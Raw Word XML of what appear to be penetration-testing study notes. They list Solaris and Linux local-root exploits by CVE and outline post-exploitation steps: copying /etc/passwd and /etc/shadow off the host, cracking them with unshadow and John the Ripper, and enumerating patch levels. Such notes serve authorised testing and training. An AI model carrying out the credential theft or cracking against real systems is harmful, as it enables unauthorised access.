          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sysinfo(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2) system call.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 Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation oldschool local root.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raptor_libnspr2. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation local root via LD_PRELOAD.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raptor_libnspr3. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation local root via constructor.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raptor_peek.c. Solaris 8, 9, 10 (CVE-2007-5225). Kernel memory disclosure with fifofs I_PEEK </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ioctl(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C019A" w:rsidRPr="009C019A" w:rsidRDefault="009C019A" w:rsidP="009C019A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Solaris/SPARC:</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raptor_ucbps. Solaris 8, 9 (CVE-1999-1587). Information leak with /usr/ucb/ps on both SPARC and x86.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raptor_rlogin.c. Solaris 2.5.1, 2.6, 7, 8 (CVE-2001-0797). Buffer overflow in System V login via rlogin vector.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raptor_ldpreload.c. Solaris 2.6, 7, 8, 9 (CVE-2003-0609). Stack-based buffer overflow in the runtime linker ld.so.1.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raptor_libdthelp.c. Solaris 7, 8, 9 (CVE-2003-0834). Buffer overflow in CDE libDtHelp via dtprintinfo help feature.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raptor_libdthelp2.c. Solaris 7, 8, 9 (CVE-2003-0834). Buffer overflow in CDE libDtHelp, non-exec stack version.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raptor_passwd.c. Solaris 8, 9 (CVE-2004-0360). Stack-based buffer overflow in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>circ(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) function of passwd(1).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raptor_sysinfo.c. Solaris 10 (CVE-2006-3824). Kernel memory disclosure with the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sysinfo(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2) system call.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lastRenderedPageBreak/>
        <w:t xml:space="preserve">raptor_xkb.c. Solaris 8, 9, 10 (CVE-2006-4655). Buffer overflow in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Strcmp(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) function of X11 XKEYBOARD.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 Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation oldschool local root.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raptor_libnspr2. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation local root via LD_PRELOAD.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raptor_libnspr3. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation local root via constructor.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raptor_peek.c. Solaris 8, 9, 10 (CVE-2007-5225). Kernel memory disclosure with fifofs I_PEEK </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ioctl(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C019A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024516A" w:rsidRDefault="0024516A" w:rsidP="00D25D85">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F2b - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>Recent or commonly-found Linux vulnerabilities, and in particular those for which there is ex</w:t>
      </w:r>
      <w:r>
        <w:t>ploit code in the public domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00720DD0" w:rsidRPr="00720DD0" w:rsidRDefault="00720DD0" w:rsidP="00720DD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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2.6.0 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId50"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51"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52"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3"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54"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5"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56"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57"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8"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59"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60"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 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId61"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62"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63"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4"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65"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6"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67"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68"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9"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70"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71"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2"/>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 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId72"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73"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74"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75"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76"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77"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78"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79"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3"/>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2.6.3-10 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId80"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81"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82"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83"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84"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4"/>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2.6.11 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId85"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86"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8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8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8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2.6.12 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId90"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91"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92"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6"/>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2.6.13 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId93"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94"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95"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96"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97"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98"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99"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00"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2.6.14 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId101"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02"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03"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04"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05"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106"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07"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08"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8"/>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2.6.15 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId109"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10"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11"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12"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13"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114"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15"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16"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9"/>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2.6.16 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId117"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18"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19"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20"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21"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2.6.17 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId12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2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2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2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2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1"/>
          <w:numId w:val="13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2.6.17.4 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId127"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28"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29"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30"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31"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2.6.18 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId13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3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3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3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3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2"/>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2.6.19 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId13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3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3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40"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41"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3"/>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2.6.20 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId14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4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4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4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4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4"/>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2.6.21 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId14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4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4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50"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1"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2.6.22 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId152"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3"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1"/>
          <w:numId w:val="13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2.6.22.7 64bit Only [</w:t>
      </w:r>
      <w:hyperlink r:id="rId154" w:tooltip="http://www.securityfocus.com/bid/25774" w:history="1">
        <w:r w:rsidRPr="00720DD0">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00720DD0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId155" w:tooltip="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573"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6"/>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2.6.23 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId156"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7"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.6.24 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00720DD0" w:rsidRPr="00720DD0" w:rsidRDefault="00720DD0" w:rsidP="00720DD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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2.6.24.1 [</w:t>
      </w:r>
      <w:hyperlink r:id="rId158"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9"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2.6.25 </w:t>
      </w:r>
      <w:hyperlink r:id="rId160"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1"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62"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63"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8"/>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2.6.26 </w:t>
      </w:r>
      <w:hyperlink r:id="rId164"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5"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66"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67"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9"/>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2.6.27 </w:t>
      </w:r>
      <w:hyperlink r:id="rId168"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9"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0"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1"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4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2.6.28 </w:t>
      </w:r>
      <w:hyperlink r:id="rId172"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73"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4"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5"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9D6D8E" w:rsidRPr="00245334" w:rsidRDefault="00720DD0" w:rsidP="00245334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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2.6.29 </w:t>
      </w:r>
      <w:hyperlink r:id="rId176"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77"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8"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9"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9D6D8E" w:rsidRPr="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F2c - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>Use of remote exploit code and local exploit code to gain root access to target host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00356B14" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE76EA" w:rsidRPr="00356B14" w:rsidRDefault="00DE76EA" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356B14">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Demo the above exploits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76EA" w:rsidRPr="00356B14" w:rsidRDefault="00DE76EA" w:rsidP="009D6D8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F2d - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>Common post-exploitation activities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>exfiltrate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D6D8E">
        <w:t xml:space="preserve"> password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002368C3" w:rsidRPr="000011EE" w:rsidRDefault="002368C3" w:rsidP="002368C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Copy /etc/passwd &amp; /etc/shadow</w:t>
      </w:r>
      <w:r w:rsidR="00816A83">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to my hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>crack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D6D8E">
        <w:t xml:space="preserve"> password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002368C3" w:rsidRPr="00816A83" w:rsidRDefault="002368C3"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unshadow</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00816A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00816A83" w:rsidRPr="00816A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;password file&gt; &lt;shadow file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C019A" w:rsidRPr="00816A83" w:rsidRDefault="009C019A"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john</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00816A83" w:rsidRPr="00816A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;password file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00816A83" w:rsidRPr="00816A83" w:rsidRDefault="00816A83"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john</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00816A83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –show &lt;password file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D6D8E">
        <w:t xml:space="preserve"> patch levels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002368C3" w:rsidRPr="000011EE" w:rsidRDefault="000011EE" w:rsidP="002368C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Solaris:</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uname</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –a &gt; uname.out</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showrev</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –p &gt; showrev.out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76EA"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pkginfo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –x &gt; pkginfo.out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000011EE" w:rsidRPr="000011EE" w:rsidRDefault="000011EE" w:rsidP="002368C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000011EE" w:rsidRPr="000011EE" w:rsidRDefault="000011EE" w:rsidP="002368C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Debian:</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shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>dpkg</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> –l  &gt; Installed_packages.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000011EE" w:rsidRPr="000011EE" w:rsidRDefault="000011EE" w:rsidP="002368C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000011EE" w:rsidRPr="000011EE" w:rsidRDefault="000011EE" w:rsidP="002368C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Redhat:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76EA" w:rsidRPr="00245334" w:rsidRDefault="00245334" w:rsidP="00245334">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shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>rpm</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00245334">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> –qa &gt; Installed_packages.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE76EA" w:rsidRPr="00245334" w:rsidRDefault="009D6D8E" w:rsidP="00245334">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:tab/>
        <w:t>derive list of missing security patches</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000011EE" w:rsidRPr="000011EE" w:rsidRDefault="000011EE" w:rsidP="00DE76EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Solaris: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000011EE" w:rsidRDefault="000011EE" w:rsidP="00245334">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pca</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –l –f . </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>missingrs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> | tee missing_patches.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245334" w:rsidRDefault="00245334" w:rsidP="00245334">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00245334" w:rsidRPr="000011EE" w:rsidRDefault="00245334" w:rsidP="00245334">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Debian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; Redhat</w:t>
      </w:r>
      <w:r w:rsidR="00356B14">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (linux)</w:t>
      </w:r>
      <w:r w:rsidRPr="000011EE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245334" w:rsidRDefault="00245334" w:rsidP="00245334">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>Chec</w:t>
      </w:r>
      <w:r w:rsidR="00356B14">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> online or use nessus with credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>reversion</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D6D8E">
        <w:t xml:space="preserve"> to previous state</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002368C3" w:rsidRPr="00D930D1" w:rsidRDefault="002368C3" w:rsidP="002368C3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D930D1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
